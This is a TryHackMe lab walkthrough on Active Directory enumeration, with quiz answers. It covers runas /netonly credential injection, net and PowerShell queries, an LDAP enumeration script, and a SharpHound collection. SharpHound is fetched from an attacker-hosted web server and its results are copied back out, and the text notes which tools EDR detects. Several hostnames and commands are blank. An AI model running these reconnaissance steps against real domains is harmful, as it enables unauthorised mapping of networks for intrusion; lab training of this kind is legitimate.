TryHackMe | Enumerating Active Directory

In this walkthrough, I demonstrate the steps I took to complete the "Enumerating Active Directory" network on TryHackMe.
In: TryHackMe, Active Directory, Attack, OSCP Prep, THM: Compromising AD

Task 1: Why AD Enumeration

Read through and understand the importance of Active Directory enumeration and how – even with low-privileged credentials – you can find some useful information to better understand the environment.

Also understand the cyclical nature of enumeration and compromise as the attacker pivots through the network.

  1. Initial Recon
  2. Initial Compromise
  3. Foothold
  4. Escalate Privileges
  5. Internal Recon
  6. Lateral Pivot
  7. Persistence
  8. Escalate Privileges
  9. Objectives met?
    • No.
      • Return to step 5
    • Yes.
      • Complete mission

Connecting to the Network

I am using my own Kali VM to complete this room, not the AttackBox provided by TryHackMe.

Download the VPN connection pack and connect to the VPN as a background service.

# Run the VPN connection as a daemon in the background
sudo openvpn --config ./adenumeration.ovpn --daemon

When finished with the room, you can terminate the VPN connection with this command:

# Find the PID of the OpenVPN process started with this config file
pid=$(pgrep -f adenumeration.ovpn)

# Send SIGTERM so OpenVPN can tear the tunnel and routes down cleanly
# (kill -9 sends SIGKILL, which skips that cleanup)
sudo kill -TERM "$pid"

Edit DNS Configuration

I didn't follow the guidance in the room and took a much more simplistic approach. Please note that the /etc/resolv.conf configurations in the before and after shown below are specific to my environment.


# Generated by NetworkManager
search cyber.range

/etc/resolv.conf (before)

In the after configuration, the nameserver entry is the IP address of thmdc (the domain controller) shown in the network diagram. The domain controller is acting as the DNS resolver in the network environment.

# Generated by NetworkManager
search cyber.range
# Shorten name resolution timeouts to 1 second
options timeout:1
# Only attempt to resolve a hostname 2 times
options attempts:2

/etc/resolv.conf (after)

Run sudo systemctl restart networking.service afterwards to apply the changes.

Test Hostname Lookups


Why does this work?

You're instructing the DNS resolution service to search between and . So, let's say you say something like this:


What's happening is this:

  1. First ask – "Do you know the IP address of ?"
  • If the domain controller answers, then stop the lookup process.
  • If the domain controller doesn't have the answer, move on.
  2. Then, ask – "Do you know the IP address of ?"

Request Credentials

This step is simulating the initial breach and credential discovery process. Navigate to in your browser and request some AD credentials.

Test SSH

Test your credentials using SSH to connect to a jump host. Replace with yours retrieved from the server.


Test RDP

Replace with yours retrieved from the server.

The /drive:.,kali-share option will let you mount the current working directory as a network drive in the RDP session, so you can upload and download files.

The +clipboard option allows copying and pasting between your Kali VM and the target.

xfreerdp / /u:'' /p:'password' / /drive:.,kali-share +clipboard

Task 2: Credential Injection

Read through and understand how you may find Active Directory credentials even on hosts unjoined to the domain. If that's the case, there are some tools we can use to leverage domain credentials when we've landed a foothold on an unjoined host.


In the example, we have the following command:

runas.exe /netonly /user:domain.tld\username cmd.exe

  • /netonly – use the credentials for network sessions only; everything else in the spawned process still runs as the current local user
  • /user – the domain account to authenticate as in network sessions (the password is prompted for but not checked at this point, since the host is not joined to the domain; a wrong password only fails once a network resource is accessed)
  • cmd.exe – spawn a new command prompt window with the injected network credential

An attacker could then use the network session to enumerate SYSVOL on the domain controller, since any authenticated domain user can read it (it holds the Group Policy files).

Kerberos vs. NTLM

Kerberos authentication relies on fully qualified domain names (FQDN): the client builds a service principal name (SPN) such as cifs/hostname from the host name it was given, and the service ticket is issued for that SPN. If you reference the host by IP address instead, no SPN can be matched, so in Active Directory environments where Kerberos authentication is enabled you can usually force a fall back to NTLM authentication simply by using the IP address of a host.

NTLM is so heavily integrated into Microsoft products that in most cases it's going to be running side-by-side with Kerberos.
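A way to check the Kerberos-versus-NTLM claim above from inside the runas /netonly session, as an added example that is not part of the room or the original walkthrough: after touching SYSVOL through a UNC path, inspect the Kerberos ticket cache for a cifs/ service ticket naming that exact target. The DC FQDN thmdc.za.tryhackme.com is assumed from the room's host name and domain; the function name is mine.

```powershell
# Added example, not from the room or the original post. Run it inside the
# PowerShell/cmd window spawned by runas /netonly so the injected domain
# credential is the one used for the network session.
# Assumption: thmdc.za.tryhackme.com is the domain controller's FQDN.

function Test-SmbAuthMethod {
    param(
        [Parameter(Mandatory)] [string] $Target   # FQDN, short name or IP address
    )

    # Windows reuses an existing SMB session without re-authenticating, so drop
    # any connection to this target first, and start from an empty ticket cache
    # (the TGT is re-acquired transparently on the next request).
    net use "\\$Target\SYSVOL" /delete /y 2>$null | Out-Null
    klist purge | Out-Null

    # Force a new SMB session setup to the target.
    Get-ChildItem -Path "\\$Target\SYSVOL" -ErrorAction Stop | Out-Null

    # Kerberos leaves a service ticket whose SPN names the target exactly as it
    # appeared in the UNC path (cifs/<target>). NTLM leaves no such ticket.
    $ticket = klist | Select-String -SimpleMatch "cifs/$Target"
    $auth = if ($ticket) { 'Kerberos' } else { 'NTLM (no cifs service ticket issued)' }

    [pscustomobject]@{ Target = $Target; Auth = $auth }
}

$dcFqdn = 'thmdc.za.tryhackme.com'
$dcIp   = (Resolve-DnsName -Name $dcFqdn -Type A | Select-Object -First 1).IPAddress

Test-SmbAuthMethod -Target $dcFqdn   # host name in the path -> Kerberos
Test-SmbAuthMethod -Target $dcIp     # IP address in the path -> falls back to NTLM
```

The net use /delete step matters: if a session to the DC is already open, Windows silently reuses it, no new ticket is issued, and the check would wrongly report NTLM. Also note that recent Windows clients can be configured to request tickets for IP-address SPNs (off by default); where that is enabled, the IP path no longer forces NTLM.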


What native Windows binary allows us to inject credentials legitimately into memory?

What parameter option of the runas binary will ensure that the injected credentials are used for all network connections?

What network folder on a domain controller is accessible by any authenticated AD account and stores GPO information?

When performing dir \\\SYSVOL, what type of authentication is performed by default?

Kerberos authentication

Task 3: Enumeration through MMC

Connect to the Jump Host

I transferred the VPN connection file to a Windows VM in my lab to test credential injection in the previous task. However, despite all of the various things I tried, I could not get DNS resolution to work from my Windows VM. So, I'll just be using the jump host here.

xfreerdp / /u:'' /p:'password123' / /drive:.,kali-share +clipboard

You don't need to worry about enabling RSAT if you're using the jump host. You can also skip the part about changing the forest and domain, as the jump host is already joined to the domain.


How many Computer objects are part of the Servers OU?

How many Computer objects are part of the Workstations OU?

How many departments (Organisational Units) does this organisation consist of?

How many Admin tiers does this organisation have?

What is the value of the flag stored in the description attribute of the account?

Task 4: Enumerating through Command Prompt

net command

  • net user /domain – Run on a domain-joined host to enumerate domain users
  • net user userName /domain – Run on a domain-joined host to get information about a specific domain user
  • net group /domain – Run on a domain-joined host to enumerate domain groups
  • net group groupName /domain – Run on a domain-joined host to get the members of a domain group
  • net accounts /domain – Run on a domain-joined host to show the domain password and account lockout policy

Two limitations to keep in mind when reading net output:

  • net does not show nested (transitive) group memberships
  • net user truncates the group membership list at 10 groups even if a user is in more


Apart from the Domain Users group, what other group is the aaron.harris account a member of?

Internet Access

Is the Guest account active? (Yay,Nay)

How many accounts are a member of the Tier 1 Admins group?

What is the account lockout duration of the current password policy in minutes?

Task 5: Enumeration through PowerShell

SSH to the Jump Host


Run the command powershell to open a PowerShell terminal. Since we are running PowerShell on a domain-joined host, we do not need to pass the -Server parameter shown in the examples.


  • Get-ADUser -Filter * – return all domain users
  • Get-ADUser -Filter 'Name -like "*stevens"' – find any user where name ends in ...stevens
  • Get-ADUser -Identity john.doe -Properties * – find the user john.doe and return all properties


  • Get-ADGroup -Filter * – return all domain groups
  • Get-ADGroup -Identity Administrators | Get-ADGroupMember – pipe the Administrators group object to Get-ADGroupMember to retrieve members of the group

AD Objects

  • Get any domain objects that we modified on or after a specific date and time
# February 28, 2022 00:00:00 (system time zone)
$modifiedDate = Get-Date '2022/02/28'
# Use a script-block filter so the DateTime is passed as a value; inside a
# double-quoted string it would be stringified and the filter would fail to parse
Get-ADObject -Filter { whenChanged -ge $modifiedDate } -IncludeDeletedObjects


  • Get-ADDomain – get information about the domain from the domain controller

Change a User Password

# Account to change (prompted for here; use the target account's sAMAccountName)
$identity = Read-Host -Prompt 'Enter the sAMAccountName of the account'
$oldPass = Read-Host -AsSecureString -Prompt 'Enter the old password'
$newPass = Read-Host -AsSecureString -Prompt 'Enter the new password'
Set-ADAccountPassword -Identity $identity -OldPassword $oldPass -NewPassword $newPass

Bonus: No RSAT? No Problem.

I wrote a brief document here on how you can borrow the Microsoft.ActiveDirectory.Management.dll from any other Windows host where you've enabled RSAT to perform these same recon tasks.

If you're on a host that is not joined to the domain, import the .dll and then use the -Server parameter to make the queries.
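One LDAP-based script that covers both the net limitations from Task 4 (no nested groups, at most 10 groups listed) and the no-RSAT case above, added here as an example rather than taken from the room or the original post. It uses the System.DirectoryServices classes from the .NET Framework, which are present on every Windows host, so neither RSAT nor the borrowed DLL is needed, and nested membership is resolved on the DC with the LDAP_MATCHING_RULE_IN_CHAIN operator. The domain za.tryhackme.com, the host name thmdc and the principals aaron.harris and Tier 1 Admins come from the room; the function names are mine and the credential and -Server values for the unjoined-host case are placeholders.

```powershell
# Added example, not from the room or the original post. LDAP enumeration with
# the built-in System.DirectoryServices .NET classes: no RSAT, no AD module.
# Assumptions: domain za.tryhackme.com with DC thmdc (from the room); the
# credential and server shown for the unjoined-host case are placeholders.

function New-DirectoryEntry ([string] $Path, [pscredential] $Credential) {
    # Without a credential the current logon session (or runas /netonly creds) is used
    if ($Credential) {
        New-Object System.DirectoryServices.DirectoryEntry(
            $Path, $Credential.UserName, $Credential.GetNetworkCredential().Password)
    } else {
        New-Object System.DirectoryServices.DirectoryEntry($Path)
    }
}

function Get-AdSearchRoot ([string] $Server, [pscredential] $Credential) {
    # RootDSE reports the domain's naming context, so nothing is hard-coded
    $prefix  = if ($Server) { "LDAP://$Server/" } else { 'LDAP://' }
    $rootDse = New-DirectoryEntry -Path "${prefix}RootDSE" -Credential $Credential
    $baseDn  = $rootDse.Properties['defaultNamingContext'].Value
    New-DirectoryEntry -Path "$prefix$baseDn" -Credential $Credential
}

function ConvertTo-LdapFilterValue ([string] $Value) {
    # RFC 4515 escaping, so a DN or name can never alter the filter's structure
    $Value -replace '\\', '\5c' -replace '\*', '\2a' -replace '\(', '\28' -replace '\)', '\29'
}

function Invoke-LdapQuery {
    param(
        [System.DirectoryServices.DirectoryEntry] $Root,
        [string]   $Filter,
        [string[]] $Properties
    )
    $searcher = New-Object System.DirectoryServices.DirectorySearcher($Root, $Filter)
    $searcher.PageSize = 1000            # paged search; AD returns at most 1000 objects per page
    foreach ($p in $Properties) { [void] $searcher.PropertiesToLoad.Add($p) }
    foreach ($result in $searcher.FindAll()) {
        $row = [ordered]@{}
        foreach ($p in $Properties) {
            # Multi-valued attributes (memberOf, servicePrincipalName) come back as lists
            $row[$p] = @($result.Properties[$p.ToLower()]) -join '; '
        }
        [pscustomobject] $row
    }
}

# Transitive (in-chain) matching rule: nested membership is resolved by the DC in one query
$InChain = '1.2.840.113556.1.4.1941'

# --- On the domain-joined jump host: the logon session's own Kerberos credentials ---
$root = Get-AdSearchRoot

# Every group aaron.harris is in, directly or through nesting, with no 10-group cap
$userDn = (Invoke-LdapQuery -Root $root -Filter '(sAMAccountName=aaron.harris)' `
            -Properties 'distinguishedName').distinguishedName
Invoke-LdapQuery -Root $root -Properties 'sAMAccountName', 'distinguishedName' `
    -Filter "(member:${InChain}:=$(ConvertTo-LdapFilterValue $userDn))"

# All user accounts that end up in Tier 1 Admins, including via nested groups.
# sAMAccountType 805306368 = normal user accounts (computer objects also carry objectClass=user)
$groupDn = (Invoke-LdapQuery -Root $root -Filter '(cn=Tier 1 Admins)' `
             -Properties 'distinguishedName').distinguishedName
Invoke-LdapQuery -Root $root -Properties 'sAMAccountName', 'title', 'memberOf' `
    -Filter "(&(sAMAccountType=805306368)(memberOf:${InChain}:=$(ConvertTo-LdapFilterValue $groupDn)))"

# --- From a host that is NOT joined to the domain: name the DC and supply credentials ---
# $cred = Get-Credential -UserName 'za.tryhackme.com\username' -Message 'AD credentials'   # placeholder
# $root = Get-AdSearchRoot -Server 'thmdc.za.tryhackme.com' -Credential $cred
```

The explicit -Server binding at the end is the equivalent of the module's -Server parameter: from an unjoined host the DC must be named (by FQDN or IP, with the DNS caveats from earlier in the room) and the domain account supplied, exactly as with runas /netonly. The escaping helper is there because a DN taken from one query is fed into the next filter; a group or user name containing parentheses would otherwise break the filter.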


What is the value of the Title attribute of Beth Nolan (beth.nolan)?

What is the value of the DistinguishedName attribute of Annette Manning (annette.manning)?

When was the Tier 2 Admins group created?

2/24/2022 10:04:41 PM

What is the value of the SID attribute of the Enterprise Admins group?

Which container is used to store deleted AD objects?

CN=Deleted Objects,DC=za,DC=tryhackme,DC=com

Task 6: Bloodhound

Read and understand the significance and history of the Bloodhound and what makes it such a powerful domain enumeration tool.

Bloodhound and Collectors

BloodHound itself is the analysis software that runs locally on the attacker's machine: a Neo4j graph database plus the BloodHound GUI. The attacker first runs a "collector" (SharpHound on Windows) on a domain-joined target, where it enumerates users, groups, computers, sessions, ACLs and trusts. After the collector finishes running, it writes a series of .json files (packed into a .zip by default) for import into the attacker's BloodHound interface.


Download Bloodhound

You can download the latest SharpHound release (SharpHound.exe packaged in a .zip archive) from the GitHub releases page:

Releases · BloodHoundAD/SharpHound

Transfer to the Target

On my Kali VM, I am going to host a Python3 web server to transfer the .zip archive to the SSH session running on the jump host.

sudo python3 -m http.server 80

Run Bloodhound

Now, from the jump host in the PowerShell session, I'll use these commands:

cd ~/Documents

# Download the .zip file from Kali (replace kali-vpn-ip with your VPN address;
# the file name is whatever you placed in the web server's root)
Invoke-WebRequest http://kali-vpn-ip/SharpHound-v1.1.0.zip -OutFile SharpHound-v1.1.0.zip

# Unzip the archive with PowerShell
Expand-Archive -Path SharpHound-v1.1.0.zip -DestinationPath SharpHound-v1.1.0
cd SharpHound-v1.1.0

Now, we're ready to run the collector, SharpHound.exe.

.\SharpHound.exe --CollectionMethods All --Domain za.tryhackme.com --ExcludeDCs

Transfer Data to Kali

Now that the collector has finished running, I've got a .zip archive of the collected .json files that I need to transfer back to Kali for analysis. I'll use SCP to transfer the file.

scp .

Analyze with Bloodhound

If this is your first time running Bloodhound, follow the instructions in the room to get started.

neo4j console &
bloodhound &

Drag and drop the .zip file to Bloodhound and wait for it to load the data.

Attack Paths

  • You can use the Search for a node... area to find specific users, groups, etc.
  • You can click on specific properties of the object to graph things out (eg. group memberships)
  • You can use the Analysis tab to run built-in queries (or write your own)
  • Much, much more


What command can be used to execute Sharphound.exe and request that it recovers Session information only from the domain without touching domain controllers?

SharpHound.exe --CollectionMethods Session --Domain za.tryhackme.com --ExcludeDCs

Apart from the krbtgt account, how many other accounts are potentially kerberoastable?

How many machines do members of the Tier 1 Admins group have administrative access to?

How many users are members of the Tier 2 Admins group?

Task 7: Conclusion

Additional Enumeration Techniques


I wrote some notes here on using a tool called ldapdomaindump.


There is a lot of documentation on the web about enumeration using PowerView, but be aware that it is a poor choice on a monitored network: its functions are widely signatured by AV and EDR products, so loading the script is likely to be flagged (or blocked by AMSI) before any enumeration happens.


Really interesting and not something I'm familiar with. Linking here for future reference:

Offensive WMI - Active Directory Enumeration (Part 5)

Clean Up DNS Changes

This will be unique to your own system and environment. For me, I'll be referring back to the Before step here.
